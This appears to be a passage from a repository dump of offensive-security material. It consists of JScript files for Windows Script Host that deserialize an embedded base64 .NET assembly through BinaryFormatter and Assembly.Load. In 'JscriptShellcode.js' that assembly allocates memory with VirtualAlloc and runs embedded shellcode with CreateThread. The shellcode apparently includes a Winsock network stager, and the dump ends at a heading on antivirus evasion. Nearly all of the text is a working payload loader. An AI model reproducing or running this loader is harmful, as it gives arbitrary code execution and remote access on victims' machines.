"ZUJveEJ1dHRvbnMAVGVzdENsYXNzAFJ1blByb2Nlc3MAT2JqZWN0AERpYWxvZ1Jlc3VsdABTdGFy"+ 71 | "dABTaG93AE1lc3NhZ2VCb3gARXhhbXBsZUFzc2VtYmx5AAAAAAAJVABlAHMAdAAAAFHJamWFAwlO"+ 72 | "rJGFIP1X2+UABCABAQgDIAABBSABARERBCABAQ4EIAEBAgoABBFFDg4RSRFNBQABElEOCLd6XFYZ"+ 73 | "NOCJCAEACAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQgBAAIAAAAAABQBAA9F"+ 74 | "eGFtcGxlQXNzZW1ibHkAACkBACRFeGFtcGxlIEFzc2VtYmx5IGZvciBEb3ROZXRUb0pTY3JpcHQA"+ 75 | "AAUBAAAAACQBAB9Db3B5cmlnaHQgwqkgSmFtZXMgRm9yc2hhdyAyMDE3AAApAQAkNTY1OThmMWMt"+ 76 | "NmQ4OC00OTk0LWEzOTItYWYzMzdhYmU1Nzc3AAAMAQAHMS4wLjAuMAAABQEAAQAAAAAAAHmcdFoA"+ 77 | "AAAAAgAAABwBAACoJgAAqAgAAFJTRFNNa8cRFMTWSo4q3onbc/8oAQAAAEQ6XFNvdXJjZUNvZGVc"+ 78 | "RG90TmV0VG9KU2NyaXB0XEV4YW1wbGVBc3NlbWJseVxvYmpcUmVsZWFzZVxFeGFtcGxlQXNzZW1i"+ 79 | "bHkucGRiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 80 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 81 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 82 | "AAAAAAAAAAAAAAAAAAAAAAAA7CcAAAAAAAAAAAAABigAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 83 | "APgnAAAAAAAAAAAAAAAAX0NvckRsbE1haW4AbXNjb3JlZS5kbGwAAAAAAP8lACAAEAAAAAAAAAAA"+ 84 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 85 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 86 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 87 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 88 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 89 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 90 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 91 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 92 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAA"+ 93 | "AAEAAQAAADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAAsAMAAAAAAAAAAAAAsAM0AAAA"+ 94 | "VgBTAF8AVgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAAAAEAAAAA"+ 95 | "AD8AAAAAAAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8A"+ 96 | "AAAAACQABAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBBADAAABAFMAdAByAGkAbgBn"+ 97 | "AEYAaQBsAGUASQBuAGYAbwAAAOwCAAABADAAMAAwADAAMAA0AGIAMAAAAGIAJQABAEMAbwBtAG0A"+ 98 | "ZQBuAHQAcwAAAEUAeABhAG0AcABsAGUAIABBAHMAcwBlAG0AYgBsAHkAIABmAG8AcgAgAEQAbwB0"+ 99 | "AE4AZQB0AFQAbwBKAFMAYwByAGkAcAB0AAAAAAAiAAEAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUA"+ 100 | "AAAAAAAAAABIABAAAQBGAGkAbABlAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAAAAAARQB4AGEAbQBw"+ 101 | "AGwAZQBBAHMAcwBlAG0AYgBsAHkAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEA"+ 102 | "LgAwAC4AMAAuADAAAABIABQAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEUAeABhAG0AcABs"+ 103 | "AGUAQQBzAHMAZQBtAGIAbAB5AC4AZABsAGwAAABiAB8AAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkA"+ 104 | "ZwBoAHQAAABDAG8AcAB5AHIAaQBnAGgAdAAgAKkAIABKAGEAbQBlAHMAIABGAG8AcgBzAGgAYQB3"+ 105 | "ACAAMgAwADEANwAAAAAAKgABAAEATABlAGcAYQBsAFQAcgBhAGQAZQBtAGEAcgBrAHMAAAAAAAAA"+ 106 | "AABQABQAAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAARQB4AGEAbQBwAGwAZQBB"+ 107 | "AHMAcwBlAG0AYgBsAHkALgBkAGwAbAAAAEAAEAABAFAAcgBvAGQAdQBjAHQATgBhAG0AZQAAAAAA"+ 108 | "RQB4AGEAbQBwAGwAZQBBAHMAcwBlAG0AYgBsAHkAAAA0AAgAAQBQAHIAbwBkAHUAYwB0AFYAZQBy"+ 109 | "AHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAOAAIAAEAQQBzAHMAZQBtAGIAbAB5ACAAVgBlAHIA"+ 110 | "cwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 111 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 112 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 113 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 114 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 115 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 116 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 117 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 118 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 119 | "AAAAAAAAAAAAAAAAAAAAAAAAIAAADAAAABg4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 120 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 121 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 122 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 123 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 124 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 125 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 126 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 127 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 128 | "AAAAAAAAAAAAAAAAAAAAAAENAAAABAAAAAkXAAAACQYAAAAJFgAAAAYaAAAAJ1N5c3RlbS5SZWZs"+ 129 | "ZWN0aW9uLkFzc2VtYmx5IExvYWQoQnl0ZVtdKQgAAAAKCwAA"; 130 | var entry_class = 'TestClass'; 131 | 132 | try { 133 | setversion(); 134 | var stm = base64ToStream(serialized_obj); 135 | var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter'); 136 | var al = new ActiveXObject('System.Collections.ArrayList'); 137 | var d = fmt.Deserialize_2(stm); 138 | al.Add(undefined); 139 | var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class); 140 | 141 | } catch (e) { 142 | debug(e.message); 143 | } -------------------------------------------------------------------------------- /Client-Side-Execution-With-Windows-Script-Host/JScript/JscriptShellcode.js: -------------------------------------------------------------------------------- 1 | function setversion() { 2 | new ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v4.0.30319'; 3 | } 4 | function debug(s) {} 5 | function base64ToStream(b) { 6 | var enc = new ActiveXObject("System.Text.ASCIIEncoding"); 7 | var length = enc.GetByteCount_2(b); 8 | var ba = enc.GetBytes_4(b); 9 | var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform"); 10 | ba = transform.TransformFinalBlock(ba, 0, length); 11 | var ms = new ActiveXObject("System.IO.MemoryStream"); 12 | ms.Write(ba, 0, (length / 4) * 3); 13 | ms.Position = 0; 14 | return ms; 15 | } 16 | 17 | var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+ 18 | "AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+ 19 | "dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+ 20 | "ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+ 21 | "AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+ 22 | "RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+ 23 | "eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+ 24 | "cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+ 25 | "aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+ 26 | "MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+ 27 | "dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+ 28 | "ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+ 29 | "B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+ 30 | "dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+ 31 | "CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+ 32 | "SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+ 33 | "cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+ 34 | "AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+ 35 | "AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+ 36 | "bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+ 37 | "NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+ 38 | "ZW1ibHkGFwAAAARMb2FkCg8MAAAAABQAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+ 39 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+ 40 | "YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMA7UK+7wAAAAAA"+ 41 | "AAAA4AAiIAsBMAAADAAAAAYAAAAAAAByKgAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAYA"+ 42 | "AAAAAAAAAIAAAAACAAAAAAAAAwBghQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAHyoA"+ 43 | "AE8AAAAAQAAAwAMAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAHApAAA4AAAAAAAAAAAAAAAAAAAA"+ 44 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+ 45 | "AAAALnRleHQAAADwCwAAACAAAAAMAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAwAMAAABA"+ 46 | "AAAABAAAAA4AAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAASAAAAAAAAAAAA"+ 47 | "AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAFMqAAAAAAAASAAAAAIABQC8IAAAtAgAAAEAAAAAAAAA"+ 48 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEzAGAF0AAAAB"+ 49 | "AAARAigQAAAKIHcBAACNEwAAASXQAQAABCgRAAAKJY5pCn4SAAAKIAAQAAAgADAAAB9AKAEAAAYL"+ 50 | "FgcGKBMAAAp+EgAAChYHfhIAAAoWfhIAAAooAgAABhUoAwAABiYqAAAAQlNKQgEAAQAAAAAADAAA"+ 51 | "AHY0LjAuMzAzMTkAAAAABQBsAAAA3AIAACN+AABIAwAAAAQAACNTdHJpbmdzAAAAAEgHAAAEAAAA"+ 52 | "I1VTAEwHAAAQAAAAI0dVSUQAAABcBwAAWAEAACNCbG9iAAAAAAAAAAIAAAFXlQI0CQIAAAD6ATMA"+ 53 | "FgAAAQAAABgAAAAEAAAAAQAAAAQAAAAMAAAAEwAAABAAAAABAAAAAQAAAAEAAAADAAAAAQAAAAEA"+ 54 | "AAABAAAAAQAAAAAAxAIBAAAAAAAGAPIBUQMGAF8CUQMGACYBEAMPAHEDAAAGAE4B4AIGANUB4AIG"+ 55 | "ALYB4AIGAEYC4AIGABIC4AIGACsC4AIGAGUB4AIGADoBMgMGABgBMgMGAJkB4AIGAIABlQIGANgD"+ 56 | "2QIGAP0AUQMGAOIA2QIGAH0C2QIGAKMDUQMGAPMD2QIGAMcA2QIGAAkD2QIGAK8CMgMAAAAAHwAA"+ 57 | "AAAAAQABAAEAEAC2AAAAQQABAAEAAAEAACgAAABBAAEABQATAQAAAQAAAEkAAgAFADMBRwA8AAAA"+ 58 | "AACAAJEgkQBAAAEAAAAAAIAAkSCpAEgABQAAAAAAgACRIMsDUgALAFAgAAAAAIYYAwMGAA0AAAAB"+ 59 | "ALIDAAACAI4CAAADAOwAAAAEAN8DAAABAIADAAACAIICAAADALwDAAAEAPcCAAAFAJMDAAAGAJ4A"+ 60 | "AAABANoAAAACACMDCQADAwEAEQADAwYAGQADAwoAKQADAxAAMQADAxAAOQADAxAAQQADAxAASQAD"+ 61 | "AxAAUQADAxAAWQADAxAAYQADAxUAaQADAxAAcQADAxAAeQADAxAAiQADAwYAgQADAwYAoQDpAx8A"+ 62 | "uQDyAicAwQD5AyoALgALAFgALgATAGEALgAbAIAALgAjAIkALgArAJ8ALgAzAJ8ALgA7AKUALgBD"+ 63 | "AIkALgBLAK0ALgBTAJ8ALgBbAJ8ALgBjAMcALgBrAPEALgBzAP4AQwBbAEwBYwB7AFIBAQB3AQAA"+ 64 | "BAAaALcCQQEDAJEAAQAAAQUAqQABAAABBwDLAwEAeCoAAAEABIAAAAEAAAAAAAAAAAAAAAAAtgAA"+ 65 | "AAQAAAAAAAAAAAAAADMAiAAAAAAABAADAAAAAF9fU3RhdGljQXJyYXlJbml0VHlwZVNpemU9Mzc1"+ 66 | "ADxNb2R1bGU+ADxQcml2YXRlSW1wbGVtZW50YXRpb25EZXRhaWxzPgBBQTI5MkNGMEM3QTAwNzc4"+ 67 | "NTBBNjg3OURDNjg0RkUwQ0ZDOUM4MUMwNTUxRTkzQzcwNjAyN0VEQ0VFQkU3RUVCAG1zY29ybGli"+ 68 | "AFZpcnR1YWxBbGxvYwBscFRocmVhZElkAENyZWF0ZVRocmVhZABKc2NyaXB0U2hlbGxjb2RlAFJ1"+ 69 | "bnRpbWVGaWVsZEhhbmRsZQBoSGFuZGxlAFZhbHVlVHlwZQBmbEFsbG9jYXRpb25UeXBlAENvbXBp"+ 70 | "bGVyR2VuZXJhdGVkQXR0cmlidXRlAEd1aWRBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBD"+ 71 | "b21WaXNpYmxlQXR0cmlidXRlAEFzc2VtYmx5VGl0bGVBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1h"+ 72 | "cmtBdHRyaWJ1dGUAVGFyZ2V0RnJhbWV3b3JrQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25B"+ 73 | "dHRyaWJ1dGUAQXNzZW1ibHlDb25maWd1cmF0aW9uQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRp"+ 74 | "b25BdHRyaWJ1dGUAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBBc3NlbWJseVByb2R1"+ 75 | "Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0"+ 76 | "cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAEJ5dGUAZHdTdGFja1NpemUAZHdT"+ 77 | "aXplAFN5c3RlbS5SdW50aW1lLlZlcnNpb25pbmcATWFyc2hhbABrZXJuZWwzMi5kbGwASnNjcmlw"+ 78 | "dFNoZWxsY29kZS5kbGwAU3lzdGVtAFN5c3RlbS5SZWZsZWN0aW9uAFplcm8AbHBQYXJhbWV0ZXIA"+ 79 | "LmN0b3IASW50UHRyAFN5c3RlbS5EaWFnbm9zdGljcwBkd01pbGxpc2Vjb25kcwBTeXN0ZW0uUnVu"+ 80 | "dGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1"+ 81 | "Z2dpbmdNb2RlcwBscFRocmVhZEF0dHJpYnV0ZXMAZHdDcmVhdGlvbkZsYWdzAFJ1bnRpbWVIZWxw"+ 82 | "ZXJzAGxwQWRkcmVzcwBscFN0YXJ0QWRkcmVzcwBXYWl0Rm9yU2luZ2xlT2JqZWN0AGZsUHJvdGVj"+ 83 | "dABJbml0aWFsaXplQXJyYXkAQ29weQAAAAAAAADKhgWBcD6KQL/0QDjhMME8AAQgAQEIAyAAAQUg"+ 84 | "AQEREQQgAQEOBCABAQIEBwIIGAcAAgESVRFZAgYYCAAEAR0FCBgICLd6XFYZNOCJAwYREAcABBgY"+ 85 | "CQkJCQAGGBgJGBgJGAUAAgkYCQgBAAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93"+ 86 | "cwEIAQACAAAAAAAVAQAQSnNjcmlwdFNoZWxsY29kZQAABQEAAAAABwEAAkhQAAAZAQAUQ29weXJp"+ 87 | "Z2h0IMKpIEhQIDIwMjIAACkBACQwNzQwODUyNi1iMTRhLTQ3YjEtYjZjOS1iOWYyNWI3YWY0MGQA"+ 88 | "AAwBAAcxLjAuMC4wAABNAQAcLk5FVEZyYW1ld29yayxWZXJzaW9uPXY0LjcuMgEAVA4URnJhbWV3"+ 89 | "b3JrRGlzcGxheU5hbWUULk5FVCBGcmFtZXdvcmsgNC43LjIFAQABAAAEAQAAAAAAAAAAcGvEmwAA"+ 90 | "AAACAAAAdwAAAKgpAACoCwAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAFJTRFObik4n364f"+ 91 | "TIb1HFXS2D/uAQAAAEM6XFVzZXJzXGthcm5rXHNvdXJjZVxyZXBvc1xKc2NyaXB0U2hlbGxjb2Rl"+ 92 | "XEpzY3JpcHRTaGVsbGNvZGVcb2JqXFJlbGVhc2VcSnNjcmlwdFNoZWxsY29kZS5wZGIARyoAAAAA"+ 93 | "AAAAAAAAYSoAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFMqAAAAAAAAAAAAAAAAX0NvckRsbE1h"+ 94 | "aW4AbXNjb3JlZS5kbGwAAAAAAAD/JQAgABD86I8AAABgMdKJ5WSLUjCLUgyLUhSLcigPt0omMf8x"+ 95 | "wKw8YXwCLCDBzw0Bx0l171JXi1IQi0I8AdCLQHiFwHRMAdCLSBiLWCAB01CFyXQ8SYs0iwHWMf8x"+ 96 | "wKzBzw0BxzjgdfQDffg7fSR14FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gWF9aixLp"+ 97 | "gP///11oMzIAAGh3czJfVGhMdyYHiej/0LiQAQAAKcRUUGgpgGsA/9VqCmh/AAABaAIAAbuJ5lBQ"+ 98 | "UFBAUEBQaOoP3+D/1ZdqEFZXaJmldGH/1YXAdAr/Tgh17OhnAAAAagBqBFZXaALZyF//1YP4AH42"+ 99 | "izZqQGgAEAAAVmoAaFikU+X/1ZNTagBWU1doAtnIX//Vg/gAfShYaABAAABqAFBoCy8PMP/VV2h1"+ 100 | "bk1h/9VeXv8MJA+FcP///+mb////AcMpxnXBw7vgHSoKaKaVvZ3/1TwGfAqA++B1BbtHE3JvagBT"+ 101 | "/9UAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAQAAAAGAAAgAAAAAAAAAAAAAAAAAAA"+ 102 | "AQABAAAAMAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAASAAAAFhAAABkAwAAAAAAAAAAAABkAzQAAABW"+ 103 | "AFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAEAAAAAAAAAAQAAAAAA"+ 104 | "PwAAAAAAAAAEAAAAAgAAAAAAAAAAAAAAAAAAAEQAAAABAFYAYQByAEYAaQBsAGUASQBuAGYAbwAA"+ 105 | "AAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAAALAExAIAAAEAUwB0AHIAaQBuAGcA"+ 106 | "RgBpAGwAZQBJAG4AZgBvAAAAoAIAAAEAMAAwADAAMAAwADQAYgAwAAAAGgABAAEAQwBvAG0AbQBl"+ 107 | "AG4AdABzAAAAAAAAACYAAwABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAAAAAASABQAAAAAABKABEA"+ 108 | "AQBGAGkAbABlAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAAAAAASgBzAGMAcgBpAHAAdABTAGgAZQBs"+ 109 | "AGwAYwBvAGQAZQAAAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAAxAC4AMAAuADAA"+ 110 | "LgAwAAAASgAVAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABKAHMAYwByAGkAcAB0AFMAaABl"+ 111 | "AGwAbABjAG8AZABlAC4AZABsAGwAAAAAAEwAFAABAEwAZQBnAGEAbABDAG8AcAB5AHIAaQBnAGgA"+ 112 | "dAAAAEMAbwBwAHkAcgBpAGcAaAB0ACAAqQAgAEgAUAAgADIAMAAyADIAAAAqAAEAAQBMAGUAZwBh"+ 113 | "AGwAVAByAGEAZABlAG0AYQByAGsAcwAAAAAAAAAAAFIAFQABAE8AcgBpAGcAaQBuAGEAbABGAGkA"+ 114 | "bABlAG4AYQBtAGUAAABKAHMAYwByAGkAcAB0AFMAaABlAGwAbABjAG8AZABlAC4AZABsAGwAAAAA"+ 115 | "AEIAEQABAFAAcgBvAGQAdQBjAHQATgBhAG0AZQAAAAAASgBzAGMAcgBpAHAAdABTAGgAZQBsAGwA"+ 116 | "YwBvAGQAZQAAAAAANAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAw"+ 117 | "AC4AMAAAADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAxAC4AMAAuADAA"+ 118 | "LgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 119 | "AAAAAAAAAAAAAAAAAAAAAAAAIAAADAAAAHQ6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 120 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 121 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 122 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 123 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 124 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 125 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 126 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 127 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 128 | "AAAAAAAAAAAAAAAAAAAAAAENAAAABAAAAAkXAAAACQYAAAAJFgAAAAYaAAAAJ1N5c3RlbS5SZWZs"+ 129 | "ZWN0aW9uLkFzc2VtYmx5IExvYWQoQnl0ZVtdKQgAAAAKCwAA"; 130 | var entry_class = 'JscriptShellcode'; 131 | 132 | try { 133 | setversion(); 134 | var stm = base64ToStream(serialized_obj); 135 | var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter'); 136 | var al = new ActiveXObject('System.Collections.ArrayList'); 137 | var d = fmt.Deserialize_2(stm); 138 | al.Add(undefined); 139 | var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class); 140 | 141 | } catch (e) { 142 | debug(e.message); 143 | } -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/README.md: 